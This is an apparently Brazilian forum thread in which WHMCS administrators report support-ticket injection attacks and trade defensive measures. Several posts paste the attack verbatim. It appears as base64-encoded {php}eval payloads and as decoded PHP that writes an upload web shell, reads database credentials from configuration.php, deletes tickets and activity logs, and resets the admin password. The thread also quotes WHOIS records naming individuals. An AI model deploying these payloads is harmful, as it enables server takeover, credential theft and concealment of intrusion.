Tentativas de invasão em meu WHMCS

[Cristian Augusto]

nos testes que fiz, se tiver a palavra chave no texto ou no assunto (depende como vc configurar) ele já nao cria o ticket...

Se vc cria a palavra chave "teste" (sem aspas claro) como assunto, e no assunto está: "Este é umteSte" (por exemplo), ele já não cria o ticket.

Adicionei "base64_decode" "eval" "{php}" no filtro de assunto, e de remetentes.

[Cristian Augusto]

Acabaram de tentar colocar um Gerenciador de Arquivos completo dentro do meu site..

Mas não consiguiram :(

Bando de crianças, sinceramente

Um pouco mais sobre o possível "invasor" segundo o http://centralops.net/co/DomainDossier.aspx?addr=187.17.179.25&dom_whois=true&dom_dns=true&traceroute=true&net_whois=true&svc_scan=true

Address lookup

canonical name 187-17-179-25.adllink.com.br.

addresses 187.17.179.25

Queried whois.nic.br with "adllink.com.br"...

domain: adllink.com.br

owner: Jackson Vieira Gomes (339240)

Network Whois record

Queried whois.lacnic.net with "187.17.179.25"...

inetnum: 187.17.176/20

aut-num: AS28264

abuse-c: GERAD

owner: ADLLink Provedor de Internet Via Radio LTDA

ownerid: 005.748.217/0001-06

responsible: Jackson Vieira Gomes

country: BR

owner-c: GERAD

tech-c: FJG55

inetrev: 187.17.176/20

nserver: ns1.adllink.com.br

nsstat: 20111210 AA

nslastaa: 20111210

nserver: ns2.adllink.com.br

nsstat: 20111210 AA

nslastaa: 20111210

nserver: ns3.adllink.com.br

nsstat: 20111210 AA

nslastaa: 20111210

created: 20081104

changed: 20090713

nic-hdl-br: FJG55

person: Fernando José Almeida Gouveia

e-mail: nandograva@hotmail.com

created: 20040929

changed: 20110426

nic-hdl-br: GERAD

person: Gerencia de Rede ADLLink

e-mail: hostmaster@adllink.com.br

created: 20061228

changed: 20090701

Estou entrando em contato com o abuser deste provedor de acesso a internet.

Editado Dezembro 11, 2011 por CristianAugusto
adicionais

[Cassiano Teixeira]

Acabei de receber uma tentativa ataque - Segue os dados:

Departamento: Suporte

Assunto: {php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}

Prioridade: Medium

---

{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0nKTsNCg0KJGYwcDNuID0gZm9wZW4gKCd0ZW1wbGF0ZXNfYy9pbmRleHgucGhwJywnYScpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw0KDQppZiAoJHdyaXQpIHsNCiAgICBlY2hvICc8Y2VudGVyPjxiPjxmb250IGNvbG9yPXJlZCA+RG9uZSAuLi4gR28gPT4gZG93bmxvYWRzL2luZGV4eC5waHAgOyknOw0KICAgIGZjbG9zZSgkd3JpdCk7DQp9IGVsc2Ugew0KICAgIGVjaG8gJ0Vycm9yICEhJzsNCn0NCiR0ZXh0PWZpbGVfZ2V0X2NvbnRlbnRzKCJjb25maWd1cmF0aW9uLnBocCIpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8P3BocCIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/IiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPz4iLCAiIiwgJHRleHQpOw0KZXZhbCgkdGV4dCk7DQokZGI9bXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdXNlcm5hbWUsJGRiX3Bhc3N3b3JkKSBvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvciBkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTs='));{/php}

----------------------------

IP Address: 79.106.109.46

---

Agora fico pensando.. será que o(a) idiota que esta tentando, não vai parar nunca? Pensei que tinham desistido dessa palhaçada.. :(

[ronnysantana]

Ola, boa noite,

Agora a pouco recebi um email com um ticket de suporte, fui lá ver e apareceu um base64, dei um print base64_decode(...) e apareceu isso

$code = base64_decode ("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZ T0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBs b2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI +PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+"); $mkdir = @mkdir ("king",755); $fo = fopen("king/king.php","w"); fwrite($fo,$code); $text=file_get_contents("configuration.php"); $text= str_replace("", "", $text); eval($text); $db=mysql_connect($db_host,$db_username,$db_password)or die("Can't open connection to MySQL"); mysql_select_db($db_name) or die("Can't select database"); $delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;"; mysql_query($delete); $delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';"; mysql_query($delete2); $sa = mysql_query("UPDATE tbladmins SET username='admin' WHERE id ='1';"); $sa1 = mysql_query("UPDATE tbladmins SET password = '99754106633f94d350db34d548d6091a' WHERE where id ='1';");

Parece realmente tentativa de invasão, foi a primeira vez que isso aconteceu comigo, ai eu alterei a senha do usuario do banco de dados, bloqueei o IP via .htaccess e via WHMCS, bloqueei o ticket tbm, e por fim suspendi meu site onde esta o WHMCS, pois tenho muitas informações lá nas notas.

Será que corro mais algum risco?

Aconteceu com mais alguem?

O IP de onde saiu o ticket é esse aqui: 84.235.73.244 (Cuidado amigos, parece ser da Arabia).

[Leo Amarante]

Amigo,

Aconteceu comigo a mesma coisa por volta das 23:47h com o mesmo IP. Parece um ataque em massa. No meu caso o cara conseguiu alterar a senha mas não chegou a acessar o WHMCS.

[jorgefilho]

http://forum.portaldohost.com.br/threads/6702-Tentativas-de-invas%C3%A3o-em-meu-WHMCS?highlight=tentativa+invas%E3o+whmcs

Ola, boa noite,

Agora a pouco recebi um email com um ticket de suporte, fui lá ver e apareceu um base64, dei um print base64_decode(...) e apareceu isso

$code = base64_decode ("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZ T0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBs b2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI +PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+"); $mkdir = @mkdir ("king",755); $fo = fopen("king/king.php","w"); fwrite($fo,$code); $text=file_get_contents("configuration.php"); $text= str_replace("", "", $text); eval($text); $db=mysql_connect($db_host,$db_username,$db_password)or die("Can't open connection to MySQL"); mysql_select_db($db_name) or die("Can't select database"); $delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;"; mysql_query($delete); $delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';"; mysql_query($delete2); $sa = mysql_query("UPDATE tbladmins SET username='admin' WHERE id ='1';"); $sa1 = mysql_query("UPDATE tbladmins SET password = '99754106633f94d350db34d548d6091a' WHERE where id ='1';");

Parece realmente tentativa de invasão, foi a primeira vez que isso aconteceu comigo, ai eu alterei a senha do usuario do banco de dados, bloqueei o IP via .htaccess e via WHMCS, bloqueei o ticket tbm, e por fim suspendi meu site onde esta o WHMCS, pois tenho muitas informações lá nas notas.

Será que corro mais algum risco?

Aconteceu com mais alguem?

O IP de onde saiu o ticket é esse aqui: 84.235.73.244 (Cuidado amigos, parece ser da Arabia).

[Marco Antonio]

Comigo a mesma coisa! hoje por volta de meia noite e meia, mas o IP foi outro...

[Leo Amarante]

O meliante não chegou acessar o admin, acredito que tive sorte pois estava online no momento. Mas em poucos minutos ele conseguiu alterar a senha do admin, e inserir uma pasta "king" dentro do whmcs com 4 scripts shell. Sendo um deles o WHMCS Killer... Sinceramente... deu medo do que esses scripts podem fazer. Admito que houve uma falha minha em não ter lido este post sobre a atualização do path mas o que me deixou indignado foi de não ter recebido nenhum alerta direto do Suporte WHMCS. Reportei o ocorrido ao suporte oficial e o próprio Matt respondeu informando sobre essa atualização e dizendo que foi enviado para todos os assinantes esse alerta. Pergunto aos colegas... Todos Receberam esse alerta? Pois eu não recebi !

[McGuyver]

Amigos, posso estar enganado, mas esses "ataques" só estão ocorrendo porque a maioria clica no link do e-mail com o assunto "estranho". Como medida de segurança básica, mesmo sem as atualizações o importante é não clicar no link. Examine o conteúdo antes por e-mail e exclua o ticket sem clicar no mesmo. Isso invalida o ataque pois o comando não é executado.

Os tais "atacantes" (que só ficam usando receitinha de bolo pronta) nunca fornecem o e-mail verdadeiro, sendo assim creio que os mesmo não conseguem executar o comando inserido no ticket.

Resumindo: Como todos deveriam fazer com qualquer e-mail que tenha um link estranho ou conteúdo inválido/impessoal, basta excluí-lo sem abrí-lo.

Simples assim!

Me corrijam se eu estiver errado, OK?

Abraços!

[ronnysantana]

Por segurança ativei a seguinte opção: Permitir abertura de tickets nesse departamento somente por clientes registrados.

Acho que isso já ajuda bastante, agora vou ver se tem como pedir autorização do administrador antes de ativar o cliente